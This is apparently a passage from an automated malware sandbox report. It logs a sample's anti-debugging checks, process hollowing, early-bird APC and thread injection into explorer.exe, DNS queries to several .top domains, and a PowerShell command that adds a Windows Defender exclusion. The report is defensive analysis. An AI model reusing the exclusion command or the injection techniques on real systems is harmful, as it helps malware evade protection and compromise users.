              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9AFF10 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916730 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94E730 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B73D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93B73D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914F2E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914F2E mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9A5F5F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91A745 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DF4C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942F70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916F60 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A916F60 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93E760 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93E760 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8F6A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91649B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91649B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4496 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A911480 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914CB0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E9CB3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8CD6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A912CDB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D14FB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8C14 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC01 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914439 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94BC2C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8450 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A955C70 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A92FC77 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8C75 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94AC7B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93746D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913591 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9DB581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9435A1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9CFDD3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9115C1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9195F0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9195F0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C8DF1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9495EC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D3518 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91F51D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91AD30 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A941520 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A937D50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C8D47 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9C3D40 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91354C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A91354C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93C577 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93C577 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00416842 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00412AB1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A946B90 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 15_1_004026C8 LdrLoadDll,
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_0041CC60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_004203D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00410E58 SetUnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_004110A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00415393 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00410CF3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Early bird code injection technique detectedShow sources
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\DF9C.exe
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\explorer.exeDomain query: xacokuo8.top
              Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
              Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
              Source: C:\Windows\explorer.exeDomain query: hajezey1.top
              Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
              Benign windows process drops PE filesShow sources
              Source: C:\Windows\explorer.exeFile created: ffjbuft.4.drJump to dropped file
              Maps a DLL or memory area into another processShow sources
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000 protect: page execute and read and write
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeMemory written: C:\Users\user\AppData\Local\Temp\6EC5.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeMemory written: C:\Users\user\AppData\Local\Temp\DF9C.exe base: 400000 value starts with: 4D5A
              Contains functionality to inject code into remote processesShow sources
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 13_2_02C30110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeThread created: C:\Windows\explorer.exe EIP: 2871920
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeThread created: unknown EIP: 4EC1920
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeThread created: unknown EIP: 85F19C0
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeThread created: unknown EIP: 7E21920
              Adds a directory exclusion to Windows DefenderShow sources
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
              Sample uses process hollowing techniqueShow sources
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeSection unmapped: C:\Users\user\AppData\Local\Temp\6EC5.exe base address: 400000
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 402000
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 41C000
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 41E000
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe base: 48D7008
              Queues an APC in another process (thread injection)Show sources
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\DF9C.exe
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeProcess created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
              Source: C:\Users\user\AppData\Roaming\irjbuftProcess created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
